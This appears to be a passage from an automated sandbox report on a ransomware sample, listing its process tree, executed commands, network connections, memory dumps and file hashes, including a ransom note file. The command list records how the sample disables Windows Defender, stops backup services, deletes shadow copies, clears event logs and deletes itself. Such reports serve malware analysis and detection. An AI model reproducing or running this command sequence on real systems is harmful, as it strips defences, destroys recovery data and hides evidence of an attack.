PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 612 wrote to memory of 844 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 356 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe
PID 3328 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe

"C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_13048" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13048" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_13048" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\notepad.exe

notepad.exe C:\UZEP_HOW_TO_DECRYPT.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe"

C:\Windows\SysWOW64\PING.EXE

ping.exe -n 5 127.0.0.1

Network

Country Destination Domain Proto
US 52.109.12.20:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp
NL 23.2.164.159:80 tcp

Files

memory/1816-115-0x0000000000000000-mapping.dmp

memory/3404-116-0x0000000000000000-mapping.dmp

memory/3408-117-0x0000000000000000-mapping.dmp

memory/3340-118-0x0000000000000000-mapping.dmp

memory/1912-119-0x0000000000000000-mapping.dmp

memory/4272-120-0x0000000000000000-mapping.dmp

memory/4180-121-0x0000000000000000-mapping.dmp

memory/816-122-0x0000000000000000-mapping.dmp

memory/4332-123-0x0000000000000000-mapping.dmp

memory/4420-124-0x0000000000000000-mapping.dmp

memory/4296-125-0x0000000000000000-mapping.dmp

memory/4460-126-0x0000000000000000-mapping.dmp

memory/3208-127-0x0000000000000000-mapping.dmp

memory/4500-128-0x0000000000000000-mapping.dmp

memory/1800-129-0x0000000000000000-mapping.dmp

memory/432-130-0x0000000000000000-mapping.dmp

memory/612-131-0x0000000000000000-mapping.dmp

memory/844-132-0x0000000000000000-mapping.dmp

memory/3132-133-0x0000000000000000-mapping.dmp

memory/356-134-0x0000000000000000-mapping.dmp

memory/1220-135-0x0000000000000000-mapping.dmp

memory/1432-136-0x0000000000000000-mapping.dmp

memory/1700-137-0x0000000000000000-mapping.dmp

memory/1836-138-0x0000000000000000-mapping.dmp

memory/2192-139-0x0000000000000000-mapping.dmp

memory/2452-140-0x0000000000000000-mapping.dmp

memory/2700-141-0x0000000000000000-mapping.dmp

memory/2780-142-0x0000000000000000-mapping.dmp

memory/3732-143-0x0000000000000000-mapping.dmp

memory/680-144-0x0000000000000000-mapping.dmp

memory/4056-145-0x0000000000000000-mapping.dmp

memory/4808-146-0x0000000000000000-mapping.dmp

memory/4864-147-0x0000000000000000-mapping.dmp

memory/1460-148-0x0000000000000000-mapping.dmp

memory/3080-149-0x0000000000000000-mapping.dmp

memory/4832-150-0x0000000000000000-mapping.dmp

memory/4576-151-0x0000000000000000-mapping.dmp

memory/4884-152-0x0000000000000000-mapping.dmp

memory/2672-153-0x0000000000000000-mapping.dmp

memory/1112-154-0x0000000000000000-mapping.dmp

memory/516-155-0x0000000000000000-mapping.dmp

memory/2392-156-0x0000000000000000-mapping.dmp

memory/4656-157-0x0000000000000000-mapping.dmp

memory/852-158-0x0000000000000000-mapping.dmp

memory/4452-159-0x0000000000000000-mapping.dmp

memory/4544-160-0x0000000000000000-mapping.dmp

memory/1572-161-0x0000000000000000-mapping.dmp

memory/1920-162-0x0000000000000000-mapping.dmp

memory/1852-163-0x0000000000000000-mapping.dmp

memory/4444-164-0x0000000000000000-mapping.dmp

memory/2232-165-0x0000000000000000-mapping.dmp

memory/2036-166-0x0000000000000000-mapping.dmp

memory/2900-167-0x0000000000000000-mapping.dmp

memory/4768-168-0x0000000000000000-mapping.dmp

memory/2240-169-0x0000000000000000-mapping.dmp

memory/4352-170-0x0000000000000000-mapping.dmp

memory/4088-171-0x0000000000000000-mapping.dmp

memory/3244-172-0x0000000000000000-mapping.dmp

memory/3792-173-0x0000000000000000-mapping.dmp

memory/3812-174-0x0000000000000000-mapping.dmp

memory/3960-175-0x0000000000000000-mapping.dmp

memory/4164-176-0x0000000000000000-mapping.dmp

memory/3096-177-0x0000000000000000-mapping.dmp

memory/3832-178-0x0000000000000000-mapping.dmp

memory/360-180-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

memory/360-179-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

memory/360-181-0x0000000006A90000-0x0000000006AC6000-memory.dmp

memory/360-182-0x0000000007230000-0x0000000007858000-memory.dmp

memory/360-183-0x0000000006BF0000-0x0000000006BF1000-memory.dmp

memory/360-184-0x0000000006BF2000-0x0000000006BF3000-memory.dmp

memory/360-185-0x0000000006F70000-0x0000000006F92000-memory.dmp

memory/360-186-0x0000000007010000-0x0000000007076000-memory.dmp

memory/360-187-0x00000000071B0000-0x0000000007216000-memory.dmp

memory/360-188-0x0000000007B40000-0x0000000007E90000-memory.dmp

memory/360-189-0x00000000079C0000-0x00000000079DC000-memory.dmp

memory/360-190-0x0000000007F60000-0x0000000007FAB000-memory.dmp

memory/360-191-0x0000000008290000-0x0000000008306000-memory.dmp

memory/360-192-0x0000000002DD0000-0x0000000002DD1000-memory.dmp

memory/360-200-0x0000000007230000-0x0000000007858000-memory.dmp

memory/360-201-0x00000000090E0000-0x0000000009113000-memory.dmp

memory/360-202-0x00000000090E0000-0x0000000009113000-memory.dmp

memory/360-203-0x0000000006F70000-0x0000000006F92000-memory.dmp

memory/360-204-0x0000000007010000-0x0000000007076000-memory.dmp

memory/360-205-0x00000000071B0000-0x0000000007216000-memory.dmp

memory/360-206-0x0000000007F60000-0x0000000007FAB000-memory.dmp

memory/360-207-0x0000000008290000-0x0000000008306000-memory.dmp

memory/360-208-0x00000000090C0000-0x00000000090DE000-memory.dmp

memory/360-213-0x0000000009460000-0x0000000009505000-memory.dmp

memory/360-215-0x0000000006BF3000-0x0000000006BF4000-memory.dmp

memory/360-214-0x000000007F830000-0x000000007F831000-memory.dmp

memory/360-216-0x0000000009640000-0x00000000096D4000-memory.dmp

memory/360-409-0x00000000095A0000-0x00000000095BA000-memory.dmp

memory/360-414-0x00000000095A0000-0x00000000095BA000-memory.dmp

memory/360-415-0x0000000009580000-0x0000000009588000-memory.dmp

memory/360-420-0x0000000009580000-0x0000000009588000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/2332-433-0x0000000004850000-0x0000000004886000-memory.dmp

memory/2332-434-0x00000000074E0000-0x0000000007B08000-memory.dmp

memory/2332-435-0x00000000072C0000-0x00000000072E2000-memory.dmp

memory/2332-436-0x0000000007B80000-0x0000000007BE6000-memory.dmp

memory/2332-437-0x0000000007B10000-0x0000000007B76000-memory.dmp

memory/2332-438-0x0000000007CF0000-0x0000000008040000-memory.dmp

memory/2332-439-0x0000000003040000-0x0000000003041000-memory.dmp

memory/2332-440-0x0000000003042000-0x0000000003043000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 518d86f71236ae615fc6178a24af8ef9
SHA1 94f98420db55681679be31f1ce33ced537df589b
SHA256 bc7e28d64ad5e22ef44869a944909a5aac5c0013fd078d69c0bf1b49414178ba
SHA512 c389965b3071340cf02ab79b1a6edb458ea1897212b267c7147a47042b356fa48bfc3c24f874439686dc8390d1b8b6ff1a8094db268a76da11b41c366b07436c

memory/2332-442-0x00000000080C0000-0x00000000080DC000-memory.dmp

memory/2332-443-0x0000000008660000-0x00000000086AB000-memory.dmp

memory/2332-444-0x0000000008450000-0x00000000084C6000-memory.dmp

memory/2332-453-0x00000000074E0000-0x0000000007B08000-memory.dmp

memory/2332-454-0x00000000094F0000-0x0000000009523000-memory.dmp

memory/2332-456-0x00000000072C0000-0x00000000072E2000-memory.dmp

memory/2332-455-0x00000000094F0000-0x0000000009523000-memory.dmp

memory/2332-457-0x0000000007B80000-0x0000000007BE6000-memory.dmp

memory/2332-459-0x0000000008660000-0x00000000086AB000-memory.dmp

memory/2332-458-0x0000000007B10000-0x0000000007B76000-memory.dmp

memory/2332-460-0x0000000008450000-0x00000000084C6000-memory.dmp

memory/2332-461-0x00000000094B0000-0x00000000094CE000-memory.dmp

memory/2332-463-0x000000007E510000-0x000000007E511000-memory.dmp

memory/2332-467-0x0000000009530000-0x00000000095D5000-memory.dmp

memory/2332-468-0x00000000097B0000-0x0000000009844000-memory.dmp

memory/2332-537-0x0000000003043000-0x0000000003044000-memory.dmp

memory/2332-662-0x0000000009780000-0x000000000979A000-memory.dmp

memory/2332-667-0x0000000009780000-0x000000000979A000-memory.dmp

memory/2332-668-0x0000000009770000-0x0000000009778000-memory.dmp

memory/2332-673-0x0000000009770000-0x0000000009778000-memory.dmp

C:\UZEP_HOW_TO_DECRYPT.txt

MD5 c4bfe3cc5113f57dc2e5b89c7374e048
SHA1 3a43c21e9401fb7d6d9cd3941aa853eb407b0b6b
SHA256 4dedc0a2be54c954d754e5e597b72bb54fdd706a0039b01b0ff9107fe4c10acb
SHA512 e8dbc2b6f7142cf9ba075861026edf795ea5f6bd852e286fce821ada6f2caf4dc7ba7ecafe44a1b0dc937ab7dc67d8ea787d6518c9ee67db8b88b1557ff847c3